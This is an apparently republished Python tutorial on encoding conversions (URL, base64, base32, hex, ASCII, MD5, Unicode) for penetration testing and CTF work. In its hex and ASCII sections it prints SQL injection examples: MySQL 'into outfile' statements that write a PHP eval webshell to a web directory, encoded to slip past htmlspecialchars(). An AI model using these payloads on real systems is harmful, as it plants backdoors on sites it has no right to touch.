Home > Backend Development > Python Tutorial > Detailed explanation of examples of encoding conversion in python

Detailed explanation of examples of encoding conversion in python

Y2J
Release: 2017-05-03 15:52:49
Original
1598 people have browsed it

In daily penetration, vulnerability mining, and even CTF competitions, you will encounter various encodings, often accompanied by various conversions between these encodings. The following article mainly introduces the relevant information about the wonderful use of encoding conversion in Python. Friends who need it can refer to it. Let's take a look together.

Preface

I remember when I first started, the problem of encoding conversion was often "Baidu: url decoding, base64 encryption, hex... ", or use a software called "Xiaokui Multi-Function Conversion Tool", and then directly use the decoder function of Burpsuite, which feels quite good. However, we also encountered some problems: low online conversion efficiency (search takes up 2/3 of the time), and there are some minor problems with the two tools. For example, burp often displays garbled characters when it comes to Chinese characters.



##Until I use python as my daily coding conversion tool...


Start the py conversion journey

url encoding

url encoding is a type of packaging used by browsers The format of form input can be said to be the most familiar coding method as a web person.

>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x':'2333','y':'666'})
'y=666&x=2333'
Copy after login

Base64

Base64 is often used as some parameters for web forms and HTTP transmission, and is also commonly used for email protocols to transmit user information, etc.

>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'
Copy after login

I remember that I was tested for base32 decryption in a ctf competition. Generally, websites do not provide online decryption, and it seemed that there was no way to continue. But if you use python, it will be as simple as decrypting base64 above. You only need to change the function:

>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'
Copy after login

Hex

Hexadecimal encoding is also A common coding scheme in web applications. As web security professionals, we are well aware that MySQL injection can use hex to bypass the

htmlspecialchars() function and write into the webshell.

For example:

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'
Copy after login

The following is the method of implementing hex encryption and decryption in python:

>>> &#39;<?php @eval($_POST[a]); ?>&#39;.encode(&#39;hex&#39;)
&#39;3c3f70687020406576616c28245f504f53545b615d293b203f3e&#39;
>>>
>>> print &#39;3c3f70687020406576616c28245f504f53545b615d293b203f3e&#39;.decode(&#39;hex&#39;)
<?php @eval($_POST[a]); ?>
>>>
Copy after login

ASCii
## The

char()

function in #MySQL converts ascii code. Because of this, you can also use this feature to bypass the htmlspecialchars() function.
For example:

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile &#39;/web/1.php&#39;
Copy after login

It is very simple to use python to convert a string into ascii, but reverse conversion requires a little operation:

>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print chr(112)
p

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print &#39;&#39;.join(map(chr,l)) #感谢pcat表哥指出的方法
<?php phpinfo() ?>
Copy after login

Md5
md5 is well known in the web security community. Due to its irreversibility, most websites often use md5 when storing key data such as user passwords. encryption. Sometimes we need md5 encryption to submit the payload. In this case, it can be easily achieved by using the following method. Of course, it is recommended to use cmd5 for decryption.

>>> from hashlib import md5
>>> m = md5()
>>> m.update(&#39;this is a secret&#39;)
>>> m.hexdigest()
&#39;7dbbcee180ba4d456e4aa1cfbdad9c7b&#39;

>>> m.hexdigest()[8:-8]
&#39;80ba4d456e4aa1cf&#39;
>>>
Copy after login

Unicode to Chinese
Unicode to Chinese conversion can be encountered in many situations. Especially when doing penetration testing. If you use burp, there will be a problem of garbled Chinese characters. It is very simple to implement under python.

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陆
Copy after login

Summary

The above is the detailed content of Detailed explanation of examples of encoding conversion in python. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template